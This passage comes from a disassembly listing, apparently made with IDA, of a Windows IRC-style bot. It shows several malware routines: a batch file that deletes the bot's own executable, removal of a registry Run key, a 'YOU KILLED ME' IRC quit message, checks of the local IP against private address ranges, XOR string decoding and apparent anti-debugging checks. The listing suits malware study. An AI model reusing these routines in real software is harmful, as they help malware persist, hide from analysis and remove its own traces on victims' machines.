		cmp	[ebp+74h+var_90], 1
		jnz	short loc_4196D6
		push	offset a98	; "98"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_4196D6:				; CODE XREF: sub_419641+8Cj
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_4196F5
		cmp	[ebp+74h+var_88], 2
		jnz	short loc_4196E8
		push	offset aNt	; "NT"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_4196E8:				; CODE XREF: sub_419641+9Ej
		cmp	[ebp+74h+var_88], 1
		jnz	short loc_419707
		push	offset a95	; "95"
		jmp	short loc_4196FA
; ---------------------------------------------------------------------------

loc_4196F5:				; CODE XREF: sub_419641+40j
					; sub_419641+6Cj ...
		push	offset aUnk	; "UNK"

loc_4196FA:				; CODE XREF: sub_419641+47j
					; sub_419641+5Aj ...
		lea	eax, [ebx-1]
		push	eax
		push	esi
		call	sub_402EAE
		add	esp, 0Ch

loc_419707:				; CODE XREF: sub_419641+ABj
		mov	eax, esi
		lea	edx, [eax+1]

loc_41970C:				; CODE XREF: sub_419641+D0j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41970C
		sub	eax, edx
		cmp	[ebp+74h+arg_0], cl
		mov	[eax+esi], cl
		jz	loc_4197A3
		push	ebx
		call	sub_402A08
		mov	edi, eax
		push	edi
		call	sub_402E05
		push	eax
		push	0
		push	edi
		call	sub_407F20
		add	esp, 14h
		push	[ebp+74h+var_8C]
		lea	eax, [ebp+74h+var_84]
		push	[ebp+74h+var_90]
		push	[ebp+74h+var_94]
		push	eax
		push	esi
		push	offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
		push	edi
		call	sub_402E05
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_402EAE
		mov	eax, edi
		add	esp, 20h
		lea	ecx, [eax+1]

loc_419765:				; CODE XREF: sub_419641+129j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419765
		push	ebx
		sub	eax, ecx
		push	0
		push	esi
		mov	[eax+edi], dl
		call	sub_407F20
		push	edi
		push	offset aS_5	; "%s"
		dec	ebx
		push	ebx
		push	esi
		call	sub_402EAE
		mov	eax, esi
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_419790:				; CODE XREF: sub_419641+154j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419790
		sub	eax, ecx
		push	edi
		mov	[eax+esi], dl
		call	sub_402F5B
		pop	ecx

loc_4197A3:				; CODE XREF: sub_419641+DAj
		mov	ecx, [ebp+74h+var_4]
		pop	edi
		xor	ecx, ebp
		mov	eax, esi
		pop	ebx
		call	sub_402AD0
		add	ebp, 74h
		leave
		retn
sub_419641	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4197B6	proc near		; CODE XREF: sub_401DA7+50p
					; sub_40207A+FEp ...

var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_12		= byte ptr -12h
var_11		= byte ptr -11h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	edi
		xor	eax, eax
		lea	edi, [ebp+var_18]
		stosd
		stosd
		stosd
		stosd
		xor	eax, eax
		mov	edi, esi
		stosd
		stosd
		stosd
		stosd
		lea	eax, [ebp+var_1C]
		push	eax
		lea	eax, [ebp+var_18]
		push	eax
		push	[ebp+arg_0]
		mov	[ebp+var_1C], 10h
		call	ds:dword_41D238	; getsockname
		movzx	eax, [ebp+var_11]
		push	eax
		movzx	eax, [ebp+var_12]
		push	eax
		movzx	eax, [ebp+var_13]
		push	eax
		movzx	eax, [ebp+var_14]
		push	eax
		push	offset aD_D_D_D_0 ; "%d.%d.%d.%d"
		push	0Fh
		push	esi
		call	sub_402EAE
		mov	eax, esi
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_419819:				; CODE XREF: sub_4197B6+68j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419819
		sub	eax, ecx
		mov	ecx, [ebp+var_8]
		mov	[eax+esi], dl
		xor	ecx, ebp
		mov	eax, esi
		pop	edi
		call	sub_402AD0
		leave
		retn
sub_4197B6	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419834	proc near		; CODE XREF: sub_4022D6+10Cp
					; sub_417E66+A5p ...

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	esi
		mov	esi, ecx
		mov	cl, [eax]
		test	cl, cl
		push	edi
		jz	short loc_41989D

loc_419842:				; CODE XREF: sub_419834+24j
		mov	dl, [esi]
		cmp	dl, 2Ah
		jz	short loc_41985A
		cmp	dl, cl
		jz	short loc_419852
		cmp	dl, 3Fh
		jnz	short loc_419878

loc_419852:				; CODE XREF: sub_419834+17j
		inc	esi
		inc	eax
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_419842

loc_41985A:				; CODE XREF: sub_419834+13j
		mov	cl, [eax]
		test	cl, cl
		jz	short loc_41989D
		mov	edi, [ebp+var_4]

loc_419863:				; CODE XREF: sub_419834+5Fj
		mov	dl, [esi]
		cmp	dl, 2Ah
		jnz	short loc_41987C
		inc	esi
		cmp	byte ptr [esi],	0
		jz	short loc_419897
		mov	[ebp+var_4], esi
		lea	edi, [eax+1]
		jmp	short loc_41988F
; ---------------------------------------------------------------------------

loc_419878:				; CODE XREF: sub_419834+1Cj
		xor	eax, eax
		jmp	short loc_4198A9
; ---------------------------------------------------------------------------

loc_41987C:				; CODE XREF: sub_419834+34j
		cmp	dl, cl
		jz	short loc_41988D
		cmp	dl, 3Fh
		jz	short loc_41988D
		mov	esi, [ebp+var_4]
		mov	eax, edi
		inc	edi
		jmp	short loc_41988F
; ---------------------------------------------------------------------------

loc_41988D:				; CODE XREF: sub_419834+4Aj
					; sub_419834+4Fj
		inc	esi
		inc	eax

loc_41988F:				; CODE XREF: sub_419834+42j
					; sub_419834+57j
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_419863
		jmp	short loc_41989D
; ---------------------------------------------------------------------------

loc_419897:				; CODE XREF: sub_419834+3Aj
		xor	eax, eax
		inc	eax
		jmp	short loc_4198A9
; ---------------------------------------------------------------------------

loc_41989C:				; CODE XREF: sub_419834+6Cj
		inc	esi

loc_41989D:				; CODE XREF: sub_419834+Cj
					; sub_419834+2Aj ...
		cmp	byte ptr [esi],	2Ah
		jz	short loc_41989C
		xor	eax, eax
		cmp	[esi], al
		setz	al

loc_4198A9:				; CODE XREF: sub_419834+46j
					; sub_419834+66j
		pop	edi
		pop	esi
		leave
		retn
sub_419834	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4198AD	proc near		; CODE XREF: sub_419C67+14Ap

var_23C		= byte ptr -23Ch
var_23B		= byte ptr -23Bh
var_13C		= byte ptr -13Ch
var_13B		= byte ptr -13Bh
var_3C		= byte ptr -3Ch
var_3B		= byte ptr -3Bh
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 23Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		xor	ebx, ebx
		push	37h
		lea	eax, [ebp+var_3B]
		push	ebx
		push	eax
		mov	[ebp+var_3C], bl
		call	sub_407F20
		mov	esi, 0FFh
		push	esi
		lea	eax, [ebp+var_23B]
		push	ebx
		push	eax
		mov	[ebp+var_23C], bl
		call	sub_407F20
		push	esi
		lea	eax, [ebp+var_13B]
		push	ebx
		push	eax
		mov	[ebp+var_13C], bl
		call	sub_407F20
		add	esp, 24h
		push	100h
		lea	eax, [ebp+var_13C]
		push	eax
		push	ebx
		call	ds:dword_41D0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41D060	; GetModuleFileNameA
		lea	eax, [ebp+var_13C]
		push	eax
		push	eax
		lea	eax, [ebp+var_23C]
		push	offset a@echoOff1DelSI ; "@echo	off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
		push	eax
		call	sub_403475
		push	104h
		call	sub_402A08
		mov	esi, eax
		push	esi
		call	sub_402E05
		add	esp, 18h
		dec	eax
		push	eax
		push	esi
		call	ds:dword_41D0F0	; GetSystemDirectoryA
		call	sub_403723
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_403723
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_403723
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_403723
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		push	edx
		call	sub_403723
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		push	edx
		call	sub_403723
		push	0Ah
		pop	ecx
		cdq
		idiv	ecx
		lea	eax, [ebp+var_3C]
		push	edx
		push	esi
		push	offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
		push	eax
		call	sub_403475
		push	esi
		call	sub_402F5B
		lea	eax, [ebp+var_3C]
		push	offset aW	; "w"
		push	eax
		call	sub_4035B4
		mov	esi, eax
		add	esp, 30h
		cmp	esi, ebx
		jz	short loc_4199FB
		lea	eax, [ebp+var_23C]
		push	eax
		push	offset aS_6	; "%s"
		push	esi
		call	sub_4035C7
		push	esi
		call	sub_403884
		add	esp, 10h
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_3C]
		push	eax
		push	ebx
		push	ebx
		call	ds:dword_41D1E0

loc_4199FB:				; CODE XREF: sub_4198AD+122j
		mov	ecx, [ebp+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_4198AD	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419A09	proc near		; CODE XREF: sub_41BED6+199p
					; sub_41C28D+1E2p

var_16C		= dword	ptr -16Ch
var_168		= byte ptr -168h
var_124		= dword	ptr -124h
var_120		= byte ptr -120h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 170h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	40h
		lea	eax, [ebp+var_168]
		push	ebx
		push	eax
		mov	[ebp+var_16C], ebx
		call	sub_407F20
		xor	eax, eax
		mov	[ebp+var_124], ebx
		lea	edi, [ebp+var_120]
		stosd
		stosd
		mov	esi, 103h
		push	esi
		stosd
		lea	eax, [ebp+var_113]
		push	ebx
		push	eax
		mov	[ebp+var_114], bl
		call	sub_407F20
		lea	eax, [ebp+arg_4]
		push	eax
		push	[ebp+arg_0]
		lea	eax, [ebp+var_114]
		push	esi
		push	eax
		call	sub_4037F6
		add	esp, 28h
		lea	eax, [ebp+var_124]
		push	eax
		lea	eax, [ebp+var_16C]
		push	eax
		push	ebx
		push	ebx
		push	28h
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_114]
		push	eax
		push	ebx
		call	ds:off_41D05C
		mov	ecx, [ebp+var_8]
		test	eax, eax
		pop	edi
		setnz	al
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_419A09	endp

; ---------------------------------------------------------------------------
		push	0
		call	sub_403900
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================



sub_419AB7	proc near		; CODE XREF: sub_413DDD+81p
					; sub_413DDD+94p ...
		push	esi
		mov	esi, eax
		xor	eax, eax
		inc	eax
		sub	eax, ebx
		add	esi, eax
		cmp	esi, 1
		jg	short loc_419ACA
		mov	eax, ebx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_419ACA:				; CODE XREF: sub_419AB7+Dj
		push	2
		pop	eax
		cmp	esi, eax
		jle	short loc_419AD7

loc_419AD1:				; CODE XREF: sub_419AB7+1Ej
		add	eax, eax
		cmp	eax, esi
		jl	short loc_419AD1

loc_419AD7:				; CODE XREF: sub_419AB7+18j
		push	edi
		lea	edi, [eax-1]

loc_419ADB:				; CODE XREF: sub_419AB7+2Dj
		call	sub_41954A
		and	eax, edi
		cmp	eax, esi
		jge	short loc_419ADB
		pop	edi
		add	eax, ebx
		pop	esi
		retn
sub_419AB7	endp


; =============== S U B	R O U T	I N E =======================================



sub_419AEB	proc near		; CODE XREF: sub_4022D6+420p
					; sub_413DDD:loc_41430Dp ...
		and	dword_427BF0, 0
		push	0
		mov	dword_427BF4, 1Fh
		call	sub_403900
		mov	edx, 3FFFFFFFh
		and	eax, edx
		pop	ecx
		mov	dword_427BF8, eax
		mov	dword_427BFC, 1
		mov	eax, offset dword_427BF8
		push	esi

loc_419B20:				; CODE XREF: sub_419AEB+48j
		lea	ecx, [eax+4]
		mov	esi, [ecx]
		add	esi, [eax]
		and	esi, edx
		mov	[eax+8], esi
		mov	eax, ecx
		cmp	eax, offset dword_427CCC
		jl	short loc_419B20
		pop	esi
		retn
sub_419AEB	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419B37	proc near		; CODE XREF: sub_417C7B+E6p
					; sub_41AFA7+38Ep

var_24		= byte ptr -24h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	dword_427FFC
		mov	[ebp+var_14], 0
		xor	eax, eax
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp+var_14]
		stosb
		call	sub_4197B6
		pop	ecx
		mov	eax, esi
		mov	ecx, offset a192_168__ ; "192.168.*.*"
		call	sub_419834
		test	eax, eax
		jnz	loc_419C57
		mov	eax, esi
		mov	ecx, offset a10___ ; "10.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	loc_419C57
		mov	eax, esi
		mov	ecx, offset a111___ ; "111.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	loc_419C57
		mov	eax, esi
		mov	ecx, offset a15___ ; "15.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	loc_419C57
		mov	eax, esi
		mov	ecx, offset a16___ ; "16.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	loc_419C57
		mov	eax, esi
		mov	ecx, offset a101___ ; "101.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	short loc_419C57
		mov	eax, esi
		mov	ecx, offset a110___ ; "110.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	short loc_419C57
		mov	eax, esi
		mov	ecx, offset a112___ ; "112.*.*.*"
		call	sub_419834
		test	eax, eax
		jnz	short loc_419C57
		mov	eax, esi
		mov	ecx, offset a170_65__ ;	"170.65.*.*"
		call	sub_419834
		test	eax, eax
		jnz	short loc_419C57
		push	10h
		pop	esi

loc_419C0E:				; CODE XREF: sub_419B37+11Aj
		xor	eax, eax
		lea	edi, [ebp+var_24]
		stosd
		stosd
		stosd
		push	esi
		push	offset a172_D__	; "172.%d.*.*"
		stosd
		lea	eax, [ebp+var_24]
		push	0Fh
		push	eax
		call	sub_402EAE
		lea	eax, [ebp+var_24]
		add	esp, 10h
		lea	edx, [eax+1]

loc_419C31:				; CODE XREF: sub_419B37+FFj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_419C31
		sub	eax, edx
		mov	[ebp+eax+var_24], cl
		lea	eax, [ebp+var_14]
		lea	ecx, [ebp+var_24]
		call	sub_419834
		test	eax, eax
		jnz	short loc_419C57
		inc	esi
		cmp	esi, 1Fh
		jbe	short loc_419C0E
		xor	al, al
		jmp	short loc_419C59
; ---------------------------------------------------------------------------

loc_419C57:				; CODE XREF: sub_419B37+3Ej
					; sub_419B37+52j ...
		mov	al, 1

loc_419C59:				; CODE XREF: sub_419B37+11Ej
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		leave
		retn
sub_419B37	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419C67	proc near		; CODE XREF: sub_41BED6+1C5p
					; sub_41C28D+4ADp

var_2A8		= byte ptr -2A8h
var_2A0		= dword	ptr -2A0h
var_29C		= dword	ptr -29Ch
var_298		= dword	ptr -298h
var_294		= dword	ptr -294h
var_290		= dword	ptr -290h
var_28C		= byte ptr -28Ch
var_28B		= byte ptr -28Bh
var_1CC		= byte ptr -1CCh
var_1CB		= byte ptr -1CBh
var_CC		= byte ptr -0CCh
var_CB		= byte ptr -0CBh
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 2A8h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		mov	[ebp+var_298], eax
		lea	eax, [ebp+var_CB]
		push	ebx
		push	eax
		mov	[ebp+var_CC], bl
		call	sub_407F20
		add	esp, 0Ch
		push	esi
		lea	eax, [ebp+var_28B]
		push	ebx
		push	eax
		mov	[ebp+var_28C], bl
		call	sub_407F20
		add	esp, 0Ch
		push	ebx
		lea	edi, [ebp+var_CC]
		call	sub_41BDAA
		pop	ecx
		inc	esi
		push	esi
		mov	eax, edi
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		push	esi
		lea	eax, [ebp+var_28C]
		push	ebx
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		push	0FFh
		lea	eax, [ebp+var_1CB]
		push	ebx
		push	eax
		mov	[ebp+var_1CC], bl
		call	sub_407F20
		mov	eax, dword_43529C
		mov	eax, [eax]
		mov	[ebp+var_290], eax
		mov	eax, offset dword_435298
		add	esp, 0Ch
		mov	[ebp+var_294], eax
		mov	[ebp+var_2A0], eax

loc_419D20:				; CODE XREF: sub_419C67+102j
		mov	eax, dword_43529C
		lea	edi, [ebp+var_2A0]
		lea	esi, [ebp+var_294]
		mov	[ebp+var_29C], eax
		call	sub_40166F
		test	al, al
		jz	short loc_419D77
		mov	edi, offset aRegistryMonito ; "Registry	Monitor"
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	11h
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [ebp+var_294]
		jz	short loc_419D6B
		lea	edi, [ebp+var_2A8]
		call	sub_40168C
		jmp	short loc_419D20
; ---------------------------------------------------------------------------

loc_419D6B:				; CODE XREF: sub_419C67+F5j
		call	sub_40164F
		mov	eax, [eax]
		call	sub_4147FC

loc_419D77:				; CODE XREF: sub_419C67+D7j
		mov	edi, 100h
		push	edi
		lea	esi, [ebp+var_1CC]
		mov	ebx, offset byte_426729
		call	sub_419EC1
		pop	ecx
		mov	eax, esi
		push	eax
		push	offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	80000002h
		call	sub_417722
		add	esp, 0Ch
		push	edi
		mov	eax, esi
		push	0
		push	eax
		call	sub_407F20
		add	esp, 0Ch
		call	sub_4198AD
		push	[ebp+var_298]
		mov	edi, offset dword_427FFC
		push	offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
		call	sub_417ABC
		pop	ecx
		pop	ecx
		push	0
		call	ds:off_41D050
		int	3		; Trap to Debugger
		jmp	ds:off_41D08C
sub_419C67	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419DDC	proc near		; CODE XREF: sub_41C28D:loc_41C2D3p

var_18		= byte ptr -18h
var_13		= byte ptr -13h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		call	ds:dword_41D0C8	; GetCurrentProcess
		mov	esi, offset dword_4207B0
		lea	edi, [ebp+var_10]
		movsd
		movsd
		push	40h
		push	3000h
		movsb
		push	6
		mov	ebx, eax
		xor	edi, edi
		push	edi
		lea	eax, [ebp+var_18]
		push	ebx
		mov	[ebp+var_10+3],	eax
		call	ds:dword_41D0BC	; VirtualAllocEx
		mov	esi, eax
		cmp	esi, edi
		jnz	short loc_419E25

loc_419E21:				; CODE XREF: sub_419DDC+58j
		xor	al, al
		jmp	short loc_419E58
; ---------------------------------------------------------------------------

loc_419E25:				; CODE XREF: sub_419DDC+43j
		push	edi
		push	40h
		push	6
		push	esi
		push	ebx
		call	ds:dword_41D0C0	; VirtualProtectEx
		test	eax, eax
		jnz	short loc_419E21
		mov	eax, [ebp+var_10]
		mov	[esi], eax
		mov	eax, [ebp+var_C]
		mov	[esi+4], eax
		call	esi	; send
		push	8000h
		push	edi
		push	esi
		push	ebx
		call	ds:dword_41D0C4	; VirtualFreeEx
		cmp	[ebp+var_13], 0D0h
		setnbe	al

loc_419E58:				; CODE XREF: sub_419DDC+47j
		mov	ecx, [ebp+var_4]
		pop	edi
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402AD0
		leave
		retn
sub_419DDC	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419E67	proc near		; CODE XREF: sub_41C28D+24p

var_C		= byte ptr -0Ch
var_B		= byte ptr -0Bh
var_A		= byte ptr -0Ah
var_9		= byte ptr -9
var_8		= byte ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 0Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	offset aMessageboxa_0 ;	"MessageBoxA"
		push	offset aUser32_dll ; "user32.dll"
		mov	[ebp+var_C], 55h
		mov	[ebp+var_B], 8Bh
		mov	[ebp+var_A], 0ECh
		mov	[ebp+var_9], 81h
		mov	[ebp+var_8], 0ECh
		call	ds:off_41D0E4
		push	eax
		call	ds:off_41D0E8
		push	5
		mov	esi, eax
		pop	ecx
		xor	eax, eax
		lea	edi, [ebp+var_C]
		repe cmpsb
		mov	ecx, [ebp+var_4]
		setz	al
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402AD0
		leave
		retn
sub_419E67	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419EC1	proc near		; CODE XREF: sub_40177B+81p
					; sub_4019F3+81p ...

var_4		= dword	ptr -4
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		push	ecx
		push	edi
		push	[ebp+arg_0]
		xor	edi, edi
		push	edi
		push	esi
		call	sub_407F20
		mov	eax, ebx
		add	esp, 0Ch
		lea	ecx, [eax+1]

loc_419EDA:				; CODE XREF: sub_419EC1+1Ej
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419EDA
		sub	eax, ecx
		jz	short loc_419F4B
		mov	eax, [ebp+arg_0]
		dec	eax
		mov	[ebp+var_4], eax

loc_419EEC:				; CODE XREF: sub_419EC1+88j
		mov	eax, offset aCxaxsvayjgngjs ; "cXAXsVAYjgnGjsIt"
		lea	edx, [eax+1]

loc_419EF4:				; CODE XREF: sub_419EC1+38j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_419EF4
		sub	eax, edx
		jz	short loc_419F01
		xor	eax, eax

loc_419F01:				; CODE XREF: sub_419EC1+3Cj
		movsx	ecx, byte ptr [edi+ebx]
		movsx	eax, byte ptr aCxaxsvayjgngjs[eax] ; "cXAXsVAYjgnGjsIt"
		xor	ecx, eax
		xor	ecx, 0EDh
		push	ecx
		push	esi
		push	offset dword_4207DC
		push	[ebp+var_4]
		push	esi
		call	sub_402EAE
		mov	eax, esi
		add	esp, 14h
		lea	ecx, [eax+1]

loc_419F2C:				; CODE XREF: sub_419EC1+70j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419F2C
		sub	eax, ecx
		mov	[eax+esi], dl
		mov	eax, ebx
		inc	edi
		lea	ecx, [eax+1]

loc_419F3E:				; CODE XREF: sub_419EC1+82j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419F3E
		sub	eax, ecx
		cmp	edi, eax
		jb	short loc_419EEC

loc_419F4B:				; CODE XREF: sub_419EC1+22j
		mov	eax, esi
		pop	edi
		leave
		retn
sub_419EC1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419F50	proc near		; CODE XREF: sub_41A40D+28p

var_3C		= byte ptr -3Ch
var_38		= dword	ptr -38h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= byte ptr -1Ch
ms_exc		= CPPEH_RECORD ptr -18h

		push	2Ch
		push	offset dword_421CE0
		call	__SEH_prolog4
		mov	edi, ds:dword_41D104
		call	edi	; GetTickCount
		mov	[ebp+var_20], eax
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		mov	esi, ds:off_41D028
		call	esi ; sub_4466A4
		test	eax, eax
		jnz	short loc_419F8B

loc_419F80:				; CODE XREF: sub_419F50+61j
					; sub_419F50+8Aj ...
		call	ds:dword_41D0EC	; RtlGetLastWin32Error
		jmp	loc_41A01F
; ---------------------------------------------------------------------------

loc_419F8B:				; CODE XREF: sub_419F50+2Ej
		cmp	[ebp+var_38], 1
		jz	loc_41A01D
		jmp	short loc_419FC5
; ---------------------------------------------------------------------------

loc_419F97:				; CODE XREF: sub_419F50+79j
		push	[ebp+var_24]
		call	ds:off_41D0F8
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		call	esi ; sub_4466A4
		test	eax, eax
		jz	short loc_419F80
		cmp	[ebp+var_38], 1
		jz	short loc_41A01D
		call	edi	; GetTickCount
		sub	eax, [ebp+var_20]
		cmp	eax, 12Ch
		ja	short loc_419FDE

loc_419FC5:				; CODE XREF: sub_419F50+45j
		cmp	[ebp+var_38], 3
		jz	short loc_419F97
		lea	eax, [ebp+var_3C]
		push	eax
		push	1
		push	ebx
		call	ds:off_41D01C
		test	eax, eax
		jz	short loc_419F80
		jmp	short loc_41A017
; ---------------------------------------------------------------------------

loc_419FDE:				; CODE XREF: sub_419F50+73j
					; sub_419F50+C5j
		mov	eax, 5B4h
		jmp	short loc_41A01F
; ---------------------------------------------------------------------------

loc_419FE5:				; CODE XREF: sub_419F50+CBj
		push	[ebp+var_24]
		call	ds:off_41D0F8
		lea	eax, [ebp+var_1C]
		push	eax
		push	24h
		lea	eax, [ebp+var_3C]
		push	eax
		push	0
		push	ebx
		call	esi ; sub_4466A4
		test	eax, eax
		jz	loc_419F80
		cmp	[ebp+var_38], 1
		jz	short loc_41A01D
		call	edi	; GetTickCount
		sub	eax, [ebp+var_20]
		cmp	eax, 12Ch
		ja	short loc_419FDE

loc_41A017:				; CODE XREF: sub_419F50+8Cj
		cmp	[ebp+var_38], 1
		jnz	short loc_419FE5

loc_41A01D:				; CODE XREF: sub_419F50+3Fj
					; sub_419F50+67j ...
		xor	eax, eax

loc_41A01F:				; CODE XREF: sub_419F50+36j
					; sub_419F50+93j
		call	__SEH_epilog4
		retn
sub_419F50	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A025	proc near		; CODE XREF: sub_41A690+2C7p
					; sub_41A690+36Ep

var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h

		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		push	ebx
		push	esi
		push	edi
		push	10h
		pop	esi
		lea	eax, [ebp+var_10]
		push	eax
		push	[ebp+arg_4]
		xor	edi, edi
		push	edi
		mov	[ebp+var_8], esi
		call	ds:off_41D034
		test	eax, eax
		jnz	short loc_41A04C

loc_41A048:				; CODE XREF: sub_41A025+5Fj
		xor	al, al
		jmp	short loc_41A0BD
; ---------------------------------------------------------------------------

loc_41A04C:				; CODE XREF: sub_41A025+21j
		mov	eax, [ebp+var_10]
		mov	[ebp+var_2C], eax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_28], eax
		lea	eax, [ebp+var_8]
		push	eax
		lea	eax, [ebp+var_20]
		push	eax
		push	esi
		mov	esi, ds:off_41D014
		lea	eax, [ebp+var_30]
		push	eax
		push	edi
		push	[ebp+arg_0]
		xor	ebx, ebx
		inc	ebx
		mov	[ebp+var_30], ebx
		mov	[ebp+var_24], edi
		call	esi ; sub_440B96
		mov	edi, ds:dword_41D0EC
		call	edi	; RtlGetLastWin32Error
		test	eax, eax
		jnz	short loc_41A048
		mov	eax, [ebp+var_10]
		mov	[ebp+var_1C], eax
		mov	eax, [ebp+var_C]
		mov	[ebp+var_18], eax
		xor	eax, eax
		cmp	[ebp+arg_8], eax
		mov	[ebp+var_20], ebx
		jz	short loc_41A0A2
		or	[ebp+var_14], 2
		jmp	short loc_41A0A6
; ---------------------------------------------------------------------------

loc_41A0A2:				; CODE XREF: sub_41A025+75j
		and	[ebp+var_14], 0FFFFFFFDh

loc_41A0A6:				; CODE XREF: sub_41A025+7Bj
		push	eax
